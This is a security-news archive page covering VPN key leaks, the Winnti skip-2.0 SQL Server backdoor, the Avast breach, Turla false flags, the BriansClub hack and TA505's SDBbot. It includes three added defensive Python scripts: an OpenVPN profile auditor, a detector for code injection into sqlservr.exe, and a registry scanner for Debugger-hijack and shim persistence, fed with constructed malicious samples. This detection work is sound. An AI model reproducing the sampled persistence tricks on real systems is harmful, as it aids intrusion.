Category Archives: Breaking News

NordVPN, TorGuard, and VikingVPN VPN providers disclose security breaches

NordVPN and TorGuard were hacked: threat actors leaked the private keys used to secure their web servers and VPN configuration files.

Hackers have breached the systems used by NordVPN and TorGuard VPN companies and leaked the private keys used to secure their web servers and VPN configuration files. 

The NordVPN material leaked online was stolen from one of the provider's servers last year.

The attackers leaked at least three private keys that belong to the company, one from an older NordVPN site certificate and two OpenVPN keys.

The certificate expired in October 2018, which suggests the intrusion took place last year, although it cannot be excluded that the server was simply still storing the key of an already outdated certificate.

After the keys were leaked online, experts pointed out that attackers could set up rogue VPN servers and use them to carry out MiTM attacks on users’ traffic.

Experts at Golem.de remarked that the expired certificate could be used only to carry out a MiTM attack, but it could not have been used to decrypt the traffic.

“You cannot decrypt stored VPN traffic directly with the leaked keys. The configuration files that were also leaked show that the OpenVPN configuration uses a key exchange with Diffie-Hellman, so that the connections have the so-called forward-secrecy property, which prevents subsequent decryption.” reads the post published by golem.de. “The keys could be used for a man-in-the-middle attack. In addition, it can be assumed that the attacker was able to access traffic during the hack.”


NordVPN confirmed the incident that took place in March 2018 when hackers accessed one of the datacenters in Finland operated by a third-party provider.

“A few months ago, we became aware that, on March 2018, one of the datacenters in Finland we had been renting our servers from was accessed with no authorization.” reads the statement published by the VPN provider. “The attacker gained access to the server by exploiting an insecure remote management system left by the datacenter provider. We were unaware that such a system existed. The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either.”

The company highlighted that the expired TLS key was stored only in the breached datacenter in Finland and could not have been used to decrypt the VPN traffic of any other server. The only possible way to abuse website traffic would have been a personalized and sophisticated MiTM attack to intercept a single connection that tried to access nordvpn.com.
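The point made by golem.de above is the one a practitioner should keep in mind: with an ephemeral Diffie-Hellman exchange a leaked server key does not unlock recorded sessions, but it does let a rogue server impersonate the real one for as long as clients are willing to trust it. What bounds that second risk sits in the client profile. The script below is an added example, not code from the article or from any of the providers named: it parses an OpenVPN client profile and reports the directives a hardened profile should carry (`remote-cert-tls server`, `verify-x509-name`, `tls-version-min`, `tls-crypt` or `tls-auth`, and an `auth` HMAC stronger than SHA1). The two profiles, the host name vpn.example.net and the file name ta.key are constructed placeholders. Name pinning only helps while the CA key itself has not leaked, which is why keeping the CA off the VPN server matters.

```python
"""Audit an OpenVPN client profile for the directives that bound what a leaked
server-side key lets an attacker do.  Added example, not from the article or
from any VPN provider; the two profiles below are constructed."""
import re

# Directive -> why a hardened client profile should carry it.
REQUIRED = {
    "remote-cert-tls": "only accept peers whose certificate carries the server EKU",
    "verify-x509-name": "pin the expected server certificate subject",
    "tls-version-min": "refuse TLS versions below 1.2",
}
CONTROL_CHANNEL = ("tls-crypt", "tls-auth")   # either one wraps the TLS control channel
WEAK_HMAC = {"MD5", "SHA1"}


def parse_ovpn(text):
    """Map each directive to its arguments (first occurrence wins).
    Inline blocks such as <ca>...</ca> are skipped; '#' and ';' start comments."""
    directives, in_block = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if re.match(r"^</\w+>$", line):
            in_block = False
            continue
        if re.match(r"^<\w+>$", line):
            in_block = True
            continue
        if in_block:
            continue
        name, *args = line.split()
        directives.setdefault(name, args)
    return directives


def audit_ovpn(text):
    """Return a list of findings; an empty list means every check passed."""
    d = parse_ovpn(text)
    findings = []
    for name, why in REQUIRED.items():
        if name not in d:
            findings.append(f"missing '{name}': {why}")
    if d.get("remote-cert-tls") not in (None, ["server"]):
        findings.append("'remote-cert-tls' must be 'server' in a client profile")
    if "tls-version-min" in d:
        try:
            if float(d["tls-version-min"][0]) < 1.2:
                findings.append("'tls-version-min' is below 1.2")
        except (IndexError, ValueError):
            findings.append("'tls-version-min' has no usable version argument")
    if not any(k in d for k in CONTROL_CHANNEL):
        findings.append("no 'tls-crypt' or 'tls-auth': control channel is unwrapped")
    hmac = (d.get("auth") or [""])[0]
    if hmac.upper() in WEAK_HMAC:
        findings.append(f"'auth {hmac}' uses a weak HMAC")
    return findings


# Constructed profiles; vpn.example.net and ta.key are placeholders.
WEAK_PROFILE = """\
client
dev tun
proto udp
remote vpn.example.net 1194
; no server-name pinning and no control-channel wrapping
cipher AES-256-CBC
auth SHA1
<ca>
(placeholder for a CA certificate)
</ca>
"""

HARDENED_PROFILE = """\
client
dev tun
proto udp
remote vpn.example.net 1194
remote-cert-tls server
verify-x509-name vpn.example.net name
tls-version-min 1.2
tls-crypt ta.key
cipher AES-256-GCM
auth SHA256
<ca>
(placeholder for a CA certificate)
</ca>
"""

if __name__ == "__main__":
    for label, profile in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(label, audit_ovpn(profile) or ["ok"])
```

Run against the weak profile it reports five findings; the hardened profile passes. The parser only reads the first occurrence of a directive, which matches how a reviewer usually reads a profile, and it ignores inline `<ca>`/`<cert>`/`<key>` blocks so that PEM data is never mistaken for directives.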

After the incident, NordVPN immediately launched an investigation and terminated the contract with the server provider.

The incident also impacted other VPN providers using the same data center, such as VikingVPN and TorGuard.

TorGuard was the only one of the three affected providers implementing secure PKI management, meaning that its main CA key was not stored on the affected VPN server.

“The single TorGuard server that was compromised was removed from our network in early 2018 and we have since terminated all business with the related hosting reseller because of repeated suspicious activity.” reads a statement published by TorGuard.

“TorGuard VPN or proxy traffic was not compromised during this isolated breach of a single VPN server and no sensitive information was compromised during this incident. Even though no security risk past or present was found, TorGuard has reissued all certs earlier this year per our security protocol.”

Pierluigi Paganini

(SecurityAffairs – VPN, hacking)

The post NordVPN, TorGuard, and VikingVPN VPN providers disclose security breaches appeared first on Security Affairs.

Czech Police and Intelligence agency dismantled Russian Spy ring on its soil

Czech police and intelligence services have identified a Russian espionage network whose nerve center was Russia’s embassy in Prague.

Czech police and intelligence services have dismantled a Russian espionage network that was operating via Russia’s embassy in Prague.

The officials were helped by peers at the National Organised Crime Centre (NCOZ).

According to officials, the spies were building a structure to hit targets in the Czech Republic and abroad.

Michal Koudelka, head of the Czech Republic’s BIS intelligence service, confirmed that the authorities busted the cyber espionage ring that is allegedly part of a larger organization set up by Russia and operating in other European countries.

“The network was completely destroyed and decimated,” Michal Koudelka, said in parliament, quoted by the Czech CTK news agency.

“It was created by people with links to Russian intelligence services and financed from Russia and the Russian embassy,”

In August, a parliamentary committee in the Czech Republic revealed that the National Cyber and Information Security Agency blamed a foreign state for a cyber attack that targeted the Czech Foreign Ministry.

The committee did not reveal the name of the state allegedly involved in the attack. Daily N, the Czech independent daily, has accused Russia multiple times for the attacks against the foreign ministry which took place in June.

According to a report published in September by NUKIB, the Czech National Cyber and Information Security Agency, China carried out a major cyber attack on a key government institution in the Czech Republic last year.

The report issued by the NUKIB agency states that the attack “was almost certainly carried out by a state actor or a related group,” and “a Chinese actor” is the main suspect.

Pierluigi Paganini

(SecurityAffairs – Russia, Czech police)


Winnti APT group uses skip-2.0 malware to control Microsoft SQL Servers

Security experts have discovered a new malware, dubbed skip-2.0, used by a China-linked APT group to establish a backdoor in Microsoft SQL Server systems.

Security experts at ESET have discovered a new malware, dubbed skip-2.0, used by the Chinese Winnti cyberespionage group to gain persistence on Microsoft SQL Server systems.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The experts believe that several APT groups operate under the Winnti umbrella, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, and ShadowPad.

The skip-2.0 malware was used by the threat actors to establish a backdoor in MSSQL Server 11 and 12 servers, allowing them to access any account on the server using a “magic password.” The malicious code stays under the radar by hooking the server’s logging functions.

“Earlier this year, we received a sample of this new backdoor called skip-2.0 by its authors and part of the Winnti Group’s arsenal.” reads the analysis published by ESET researcher Mathieu Tartare. “This backdoor targets MSSQL Server 11 and 12, allowing the attacker to connect stealthily to any MSSQL account by using a magic password – while automatically hiding these connections from the logs. Such a backdoor could allow an attacker to stealthily copy, modify or delete database content.”

The skip-2.0 backdoor has some similarities with other malware in the Winnti Group’s arsenal, such as the PortReuse and ShadowPad backdoors.

The PortReuse backdoor has a modular architecture, experts discovered that its components are separate processes that communicate through named pipes. Experts detected multiple PortReuse variants with a different NetAgent but using the same SK3. Each variant spotted by the experts was targeting different services and ports, including DNS over TCP (53), HTTP (80), HTTPS (443), Remote Desktop Protocol (3389) and Windows Remote Management (5985).

PortReuse was used by the Winnti cyberespionage group to target a high-profile Asian mobile software and hardware manufacturer.

The ShadowPad backdoor is a modular platform that can be used to download and execute arbitrary code on the infected system, create processes, and maintain a virtual file system in the registry.

The remote access capability implemented for the ShadowPad backdoor includes a domain generation algorithm (DGA) for C&C servers which changes every month.

Experts noticed that the three pieces of malware use the same VMProtect-packed launcher, i.e. the same packer.

The Inner-Loader observed in recent attacks looks for sqlservr.exe, the Microsoft SQL Server process, and injects a payload into it; the payload then hooks multiple logging and authentication functions inside sqllang.dll.

“The functions targeted by skip-2.0 are related to authentication and event logging.” continues the analysis.

“The most interesting function is the first one (CPwdPolicyManager::ValidatePwdForLogin), which is responsible for validating the password provided for a given user. This function’s hook checks whether the password provided by the user matches the magic password, in that case, the original function will not be called and the hook will return 0, allowing the connection even though the correct password was not provided.”

Experts pointed out that administrative privileges are required to install the hooks, which means that skip-2.0 can only be deployed on already-compromised MSSQL servers, where it serves to maintain persistence.
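Because the hooks suppress SQL Server’s own logging of the backdoor’s logins, the database audit trail cannot be relied on to show them; the remaining signal is host telemetry around the injection itself. The script below is an added example, not ESET’s detection logic: it reads Sysmon events (constructed sample lines, using the ImageLoad, Event ID 7, and CreateRemoteThread, Event ID 8, field names) and flags any module loaded into sqlservr.exe that is not validly signed by Microsoft, and any thread started in sqlservr.exe by another process. The process name, the install path and the trusted signer names are assumptions about a default installation.

```python
"""Flag Sysmon events consistent with code being injected into the SQL Server
process.  Added example, not ESET's detection logic; the events below are
constructed and use Sysmon's ImageLoad (ID 7) and CreateRemoteThread (ID 8)
field names."""
import json
import ntpath

SQLSERVER_IMAGE = "sqlservr.exe"          # assumption: default SQL Server binary name
TRUSTED_SIGNERS = {"Microsoft Corporation", "Microsoft Windows"}   # assumption

SQL_BINN = r"C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn"

# Constructed sample: one JSON object per line, one Sysmon event each.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 7, "Image": SQL_BINN + r"\sqlservr.exe",
     "ImageLoaded": SQL_BINN + r"\sqllang.dll",
     "Signed": "true", "Signature": "Microsoft Corporation", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": SQL_BINN + r"\sqlservr.exe",
     "ImageLoaded": r"C:\Windows\Temp\update.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable"},
    {"EventID": 8, "SourceImage": r"C:\Windows\Temp\loader.exe",
     "TargetImage": SQL_BINN + r"\sqlservr.exe",
     "StartAddress": "0x00007FFD1A2B0000", "StartModule": "-"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartAddress": "0x00007FFD1A2B1234", "StartModule": r"C:\Windows\System32\ntdll.dll"},
    {"EventID": 7, "Image": SQL_BINN + r"\sqlservr.exe",
     "ImageLoaded": r"C:\ProgramData\helper.dll",
     "Signed": "true", "Signature": "Contoso Ltd", "SignatureStatus": "Valid"},
])


def basename(path):
    """Case-insensitive file name of a Windows path."""
    return ntpath.basename(path).lower()


def detect(jsonl):
    """Return one alert dict per suspicious event, in log order."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        eid = ev.get("EventID")
        if eid == 7 and basename(ev.get("Image", "")) == SQLSERVER_IMAGE:
            # Module load into SQL Server: anything not validly signed by a
            # trusted signer deserves a look (sqllang.dll itself is Microsoft-signed).
            trusted = (ev.get("Signed") == "true"
                       and ev.get("SignatureStatus") == "Valid"
                       and ev.get("Signature") in TRUSTED_SIGNERS)
            if not trusted:
                alerts.append({"rule": "untrusted module loaded into SQL Server",
                               "module": ev.get("ImageLoaded")})
        elif eid == 8 and basename(ev.get("TargetImage", "")) == SQLSERVER_IMAGE:
            # A thread started inside sqlservr.exe by another process is the
            # classic footprint of DLL injection.
            alerts.append({"rule": "remote thread created in SQL Server",
                           "source": ev.get("SourceImage")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the sample the unsigned DLL, the loader’s remote thread and the DLL signed by an unexpected publisher are reported; the legitimate sqllang.dll load and the unrelated csrss.exe event are not. A real deployment would feed these rules from the Sysmon channel rather than a file, and would tune TRUSTED_SIGNERS to the publishers actually present in the SQL Server installation.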

Pierluigi Paganini

(SecurityAffairs – Winnti, skip-2.0)


Avast internal network breached for the second time by sophisticated hackers

The popular security firm Avast disclosed today a security breach that impacted its internal network, which the attackers accessed through a compromised VPN profile.

The security firm Avast disclosed today a security breach that impacted its internal network; according to a statement published by the company, the intent of the hackers was to carry out a supply chain attack.

It seems that the attackers attempted to inject malicious code into CCleaner, an attack scenario similar to the one that impacted the company in 2017.

The attack was spotted on September 23, when the Avast experts noticed suspicious behavior on the internal network. The successive investigation involved the Czech intelligence agency, Security Information Service (BIS), the local Czech police force cybersecurity division, and an external forensics team.

The hackers compromised a VPN account to access the company’s internal network. The account did not have domain admin privileges, but the hackers successfully escalated their privileges.

Avast pointed out that hackers used compromised credentials through a temporary VPN profile that did not require 2FA.

“The user, whose credentials were apparently compromised and associated with the IP, did not have domain admin privileges. However, through a successful privilege escalation, the actor managed to obtain domain admin privileges. The connection was made from a public IP hosted out of the UK and we determined the attacker also used other endpoints through the same VPN provider.” reads the statement published by Avast.

The analysis of the external IPs used by the attackers revealed that the threat actors had been attempting to gain access to the network through the VPN as early as May 14.

In an attempt to track the attackers, Avast deliberately left the temporary VPN profile open and monitored all access to the internal network through it until October 15.

“Even though we believed that CCleaner was the likely target of a supply chain attack, as was the case in a 2017 CCleaner breach, we cast a wider net in our remediation actions.” continues the statement.

Avast adopted the following measures to mitigate the incident:

  • On September 25, Avast halted upcoming CCleaner releases and began checking prior CCleaner releases.
  • The company re-signed a clean update of the product and pushed it out to users via an automatic update on October 15.
  • The company revoked the previous certificate.

At the time of writing, it is not possible to determine if this attack was linked to the one that occurred in 2017.

“Having taken all these precautions, we are confident to say that our CCleaner users are protected and unaffected,” concludes the statement.

“From the insights we have gathered so far, it is clear that this was an extremely sophisticated attempt against us that had the intention to leave no traces of the intruder or their purpose, and that the actor was progressing with exceptional caution in order to not be detected. We do not know if this was the same actor as before and it is likely we will never know for sure, so we have named this attempt ‘Abiss’.”

The company, along with law enforcement, is still investigating the incident.

Pierluigi Paganini

(SecurityAffairs – Avast, hacking)


UK/US investigation revealed that Russian Turla APT masqueraded as Iranian hackers

A joint UK and US investigation has revealed that the Russian cyber espionage group Turla carried out cyber attacks masqueraded as Iranian hackers.

According to the Financial Times, a joint UK and US investigation revealed that the Russia-linked cyberespionage group Turla conducted cyber attacks in more than 35 countries while masquerading as Iranian hackers. The use of false-flag operations in cyberspace is not a novelty, but this is the first time the Turla APT has been observed adopting such a strategy.

In 2018, the US intelligence agencies reported that Russian state-sponsored hackers used false flag attacks to hit the Winter Olympics in Pyeongchang, South Korea. At the time the hackers introduced lines of code in their malware associated with North-Korea linked Lazarus Group.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

Experts involved in the investigation believe that the Turla group has hijacked the tools of the notorious Iran-linked APT group OilRig since at least 2014. OilRig’s attacks are aligned with the strategic interests of Iran; the group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries.

Multiple attacks targeting Middle Eastern financial, energy and government organizations led FireEye to assess that those sectors are a primary concern of APT34, FireEye’s name for OilRig.

“The so-called Turla group, which has been linked with Russian intelligence, allegedly hijacked the tools of Oilrig, a group widely linked to the Iranian government, according to a two-year probe by the UK’s National Cyber Security Centre in collaboration with the US’ National Security Agency.” reported the FT.

The two-year investigation was conducted by the UK’s National Cyber Security Centre in collaboration with the US’ National Security Agency.

The experts believe that the Iranian cyberespionage group was unaware that its tools had been hijacked and used by another threat actor to hit military establishments, government departments, and universities across the world.

Paul Chichester, director of operations at the NCSC, explained that this is a major change in Turla’s TTPs, aimed at making the attribution of its attacks harder.

“We have never seen this done to the level of sophistication that we are seeing here,” Mr Chichester said. “It’s unique in the complexity and scale and sophistication. It’s actually really hard masquerading [as another entity].” “This is becoming a very crowded space and we do see people innovate quite rapidly in that domain,”

The Russian Government did not respond to a request for comment from the Financial Times; it has always denied any involvement in cyber attacks on other states.

In June, Symantec researchers revealed that Russia-Linked cyberespionage group Turla used a new toolset and hijacked command and control infrastructure operated by Iran-Linked OilRig APT.

Experts at Symantec observed at least three distinct campaigns in the last eighteen months, each using a different set of hacking tools. In one campaign the attackers used a previously unseen backdoor tracked as Neptun (Backdoor.Whisperer); the malicious code is deployed on Microsoft Exchange servers and passively listens for commands from the attackers.

Experts noticed that in one attack, Turla hackers used the infrastructure belonging to another espionage group tracked as Crambus (aka OilRig, APT34).

The three recent Turla campaigns targeted governments and international organizations worldwide.

Unfortunately, Turla and other sophisticated APT groups have the capabilities to hijack the tools and infrastructure of other state-sponsored groups, which makes the attribution of attacks extremely difficult.

Pierluigi Paganini

(SecurityAffairs – Turla, OilRig)


Hackers stole card details from BriansClub carding site

BriansClub, one of the biggest dark web “carding stores,” which specializes in the sale of stolen payment card data, has itself been hacked.

Hackers have breached BriansClub (BriansClub[.]at), one of the biggest black market sites, which specializes in the sale of stolen credit card data. According to security expert Brian Krebs, who first reported the data breach, the hackers stole data on more than 26 million payment cards.

Experts estimate that the total number of stolen cards leaked from BriansClub represents almost 30 percent of the cards available on the black market.

““BriansClub,” one of the largest underground stores for buying stolen credit card data, has itself been hacked.” reads the post published by Brian Krebs. “The data stolen from BriansClub encompasses more than 26 million credit and debit card records taken from hacked online and brick-and-mortar retailers over the past four years, including almost eight million records uploaded to the shop in 2019 alone.”

Krebs reported that last month a source shared with him a file containing the full BriansClub database; the archive included both the cards currently available for sale and historical data.

The file contains details stolen from hacked online and brick-and-mortar retailers over the past four years, including nearly eight million records that were uploaded in 2019 alone.

People who reviewed the stolen data confirmed that the same credit card records could be found in a more redacted form by searching the BriansClub Web site using a valid and funded account.

Historical data in the archive shows the rapid growth of the carding site: in 2015 the platform added just 1.7 million card records for sale; 2.89 million in 2016; 4.9 million in 2017; and 9.2 million in 2018. Between January and August 2019, BriansClub added approximately 7.6 million cards.

BriansClub acts as a broker of card data stolen by other cyber criminals, resellers or affiliates, who earn a fee from each sale.

BriansClub sold roughly 9.1 million stolen credit cards, allowing the site and its resellers to earn a total of $126 million in sales since 2015.

“There’s no easy way to tell how many of the 26 million or so cards for sale at BriansClub are still valid, but the closest approximation of that — how many unsold cards have expiration dates in the future — indicates more than 14 million of them could still be valid.” states Krebs.

According to a follow-up post published by Krebs, the administrator of BriansClub confirmed that the data center hosting his site had been hacked earlier in the year. The administrator claims that stolen data had been removed from BriansClub store inventories, but multiple sources confirmed they are still available for sale at BriansClub.

According to the administrator of the Russian cybercrime forum Verified, cited by Krebs, BriansClub was hacked by “a fairly established ne’er-do-well who uses the nickname ‘MrGreen’ and runs a competing card shop by the same name.”

“The Verified site admin said MrGreen had been banned from the forum, and added that “sending anything to Krebs is the lowest of all lows” among accomplished and self-respecting cybercriminals. I’ll take that as a compliment. That said, if the remainder of BriansClub’s competitors want to use me to take down the rest of the carding market, I’m totally fine with that.” concludes Krebs.

Pierluigi Paganini

(SecurityAffairs – BriansClub, carding)


TA505 cybercrime group use SDBbot RAT in recent campaigns

The TA505 cybercrime group, which operated the Dridex Trojan and the Locky ransomware, has been using a new RAT dubbed SDBbot in recent attacks.

Security experts at Proofpoint observed the notorious TA505 cybercrime group using a new RAT dubbed SDBbot in recent attacks.

The TA505 group, which is known to have operated both the Dridex and Locky malware families, continues to make small changes to its operations. The group has been active since 2014, focusing on the retail and banking sectors.

SDBbot is a backdoor delivered via a new downloader, dubbed Get2, written in C++. The same downloader was also used to distribute other payloads, including FlawedGrace, FlawedAmmyy, and Snatch.

The Get2 downloader was first observed in early September, when the group used it in targeted attacks against financial institutions in Greece, Singapore, the United Arab Emirates, Georgia, Sweden, Lithuania, and a few other countries.

On September 20, new phishing attacks involved thousands of emails, with English and French lures, attempting to deliver Microsoft Excel and .ISO attachments to targets in the United States and Canada.

The TA505 group started delivering SDBbot in early October, it used weaponized Microsoft Office documents leveraging the Get2 downloader.

“On October 7, instead of directly attached malicious Microsoft Excel files, Proofpoint researchers observed thousands of emails containing URL shortener links redirecting to a landing page that in turn links to an Excel sheet “request[.]xls”. This campaign only used the English language and targeted companies from various industries primarily in the United States.” reads the analysis published by Proofpoint.

SDBbot RAT

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial sample analyzed by Proofpoint. It also makes use of application shimming for persistence.

The attackers switched from attachments to shortened URLs pointing to a malicious Excel sheet; these attacks mainly targeted organizations in the United States.

Experts discovered that the Get2 downloader also implements information-gathering capabilities. It collects basic system information and sends it back to a hardcoded C&C via an HTTP POST request.

The SDBbot RAT has three main components, an installer, a loader, and a backdoor component.

The installer stores the RAT in the registry and establishes persistence for the loader. If the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry “image file execution options” method; if it is running as admin on Windows XP or 7, persistence is established using application shimming.

“All three of the persistence mechanisms require a reboot to take effect and there is no additional code to continue executing the loader and RAT components from the installer. Proofpoint researchers speculate that the reboot functionality in the Get2 downloader (described above) is used to continue SDBbot’s execution after installation in the TA505 campaigns.” continues the analysis.
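Both persistence mechanisms named above leave a registry footprint that an administrator can export with reg.exe and review offline. The following script is an added example, not Proofpoint’s code: it parses a .reg export (the sample is constructed) and reports any Image File Execution Options key carrying a Debugger value other than the Visual Studio just-in-time debugger, any custom shim database registered under AppCompatFlags\InstalledSDB, and any executable with a shim applied under AppCompatFlags\Custom. That the IFEO method amounts to a Debugger value, and that vsjitdebugger.exe is the only debugger one expects to find there, are assumptions of the example and are marked as such in the code.

```python
"""Scan a Windows registry export (.reg text) for the two persistence footholds
the article attributes to SDBbot: an Image File Execution Options "Debugger"
value and a custom application-compatibility shim database.  Added example,
not Proofpoint's code; the export below is constructed."""
import ntpath
import re

IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options" + "\\")
SHIM_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\AppCompatFlags" + "\\")
# Assumption: the Visual Studio JIT debugger is the only Debugger value expected.
EXPECTED_DEBUGGERS = {"vsjitdebugger.exe"}

# Constructed export: two benign IFEO keys, one hijacked one, and one custom shim.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe]
"UseFilter"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe]
"Debugger"="\"C:\\Windows\\System32\\vsjitdebugger.exe\" -p %ld -e %ld"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Windows\\Temp\\svchost32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{d3c2a1b0-1111-2222-3333-444455556666}]
"DatabasePath"="C:\\Windows\\AppPatch\\Custom\\{d3c2a1b0-1111-2222-3333-444455556666}.sdb"
"DatabaseDescription"="update"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\explorer.exe]
"{d3c2a1b0-1111-2222-3333-444455556666}.sdb"=hex(b):00,00,00,00,00,00,00,00
"""


def parse_reg(text):
    """Map each [key] to {value_name: data}.  String data is unescaped;
    dword:/hex: data is kept verbatim."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = re.match(r'^(?:"([^"]+)"|@)=(.*)$', line)
        if m and current is not None:
            name, data = m.group(1) or "@", m.group(2)
            if data.startswith('"') and data.endswith('"'):
                data = re.sub(r'\\(["\\])', r"\1", data[1:-1])
            keys[current][name] = data
    return keys


def debugger_exe(data):
    """File name of the executable named in a Debugger value, quoted or not."""
    value = data.strip()
    if value.startswith('"'):
        value = value[1:].split('"', 1)[0]
    else:
        value = value.split(" ", 1)[0]
    return ntpath.basename(value).lower()


def scan_reg(text):
    """Return a finding dict for every suspicious key in export order."""
    findings = []
    for key, values in parse_reg(text).items():
        if key.startswith(IFEO_PREFIX) and "Debugger" in values:
            if debugger_exe(values["Debugger"]) not in EXPECTED_DEBUGGERS:
                findings.append({"rule": "IFEO Debugger hijack",
                                 "target": ntpath.basename(key),
                                 "debugger": values["Debugger"]})
        elif key.startswith(SHIM_PREFIX + "InstalledSDB\\") and "DatabasePath" in values:
            findings.append({"rule": "custom shim database installed",
                             "path": values["DatabasePath"]})
        elif key.startswith(SHIM_PREFIX + "Custom\\"):
            for name in values:
                if name.lower().endswith(".sdb"):
                    findings.append({"rule": "shim applied to executable",
                                     "target": ntpath.basename(key), "sdb": name})
    return findings


if __name__ == "__main__":
    for finding in scan_reg(SAMPLE_REG):
        print(finding)
```

On the sample the notepad.exe hijack, the installed database and the shim on explorer.exe are reported, while the chrome.exe key (no Debugger value) and the wordpad.exe key (the expected JIT debugger) are not. Exporting the two parent keys from a known-good build and diffing the findings over time is the cheap way to turn this into a recurring check.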

The loader executes shellcode from the binary blob stored in the registry; the shellcode decompresses the RAT and loads and executes it as a DLL.

The RAT component supports typical RAT functionalities, including command shell, video recording of the screen, remote desktop, port forwarding, and file system access.

“The new Get2 downloader, when combined with the SDBbot as its payload appears to be TA505’s latest trick (or treat) for the Fall of 2019,” Proofpoint concludes.

Pierluigi Paganini

(SecurityAffairs – SDBbot RAT, TA505)


Security Affairs newsletter Round 236

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folks, let me inform you that I have suspended the newsletter service; anyway, I’ll continue to provide you with a list of the published posts every week through the blog.

A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns
Alabama Hospital chain paid ransom to resume operations after ransomware attack
Charming Kitten Campaign involved new impersonation methods
Imperva explains how hackers stole AWS API Key and accessed to customer data
Is Emotet gang targeting companies with external SOC?
Privacy advocates criticize Apple for sharing some users browsing data with Tencent
Talos experts found 11 flaws in Schneider Electric Modicon Controllers
Click2Mail suffered a data breach that potentially impacts 200,000 registrants
Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack
sudo flaw allows any user to run commands as root on Linux
Winnti Group was planning a devastating supply-chain attack against Asian manufacturer
Adobe out-of-band security updates address 82 flaws in 3 products
Approaching the Reverse Engineering of a RFID/NFC Vending Machine
Chinese-speaking cybercrime gang Rocke changes tactics
Signature update for Symantec Endpoint Protection crashed many devices
Critical and high-severity flaws addressed in Cisco Aironet APs
Cryptocurrency miners infected more than 50% of the European airport workstations
Graboid the first-ever Cryptojacking worm that targets Docker Hub
International operation dismantled largest Dark Web Child abuse site
M6 Group, largest France private multimedia group, hit by ransomware attack
China-linked cyberspies Turbine PANDA targeted aerospace firms for years
Pitney Bowes revealed that its systems were infected with Ryuk Ransomware
Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw
Systems at ingredients provider Ingredion infected with malware
Trojanized Tor Browser targets shoppers of Darknet black marketplaces
A critical Linux Wi-Fi bug could be exploited to fully compromise systems
Emsisoft released a free decryption tool for the STOP (Djvu) ransomware
Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)


US Army stopped using floppy disks as storage for SACCS system that manages nuclear weapons arsenal

The news is quite curious: the US military will no longer use 8-inch floppy disks in the antiquated computer system (SACCS) that manages its nuclear weapons arsenal.

It’s official: the US Air Force has announced that it has replaced the 8-inch floppy disks in the ancient computer used to receive nuclear launch orders from the President with a “highly-secure solid state digital storage solution.”

The use of the 8-inch floppy disks was revealed back in 2014 by the CBS “60 Minutes” TV show.

“At long last, that system, the Strategic Automated Command and Control System or SACCS, has dumped the floppy disk, moving to a “highly-secure solid state digital storage solution” this past June, said Lt. Col. Jason Rossi, commander of the Air Force’s 595th Strategic Communications Squadron.” reported c4isrnet.com.

The Strategic Automated Command and Control System (SACCS) is used by US nuclear forces to send orders from command centers to field forces in case of crisis. It is considered highly secure because it is completely isolated from the internet, although researchers have repeatedly demonstrated ways to breach air-gapped networks, and removable media such as floppy disks is precisely the channel malware has historically used to cross an air gap.

The Strategic Automated Command and Control System (SACCS) is a United States Strategic Command command and control system to coordinate the operational functions of United States nuclear forces (ICBMs, nuclear bombers, and SLBMs).

“You can’t hack something that doesn’t have an IP address. It’s a very unique system — it is old and it is very good,” Rossi added.

In June, the US Air Force has replaced the floppy disks in the SACCS nuclear weapons management system with a “highly-secure solid state digital storage solution.”

The system has been operating since 1968, running on an IBM Series/1 mainframe and using 8-inch floppy disks as its storage medium.

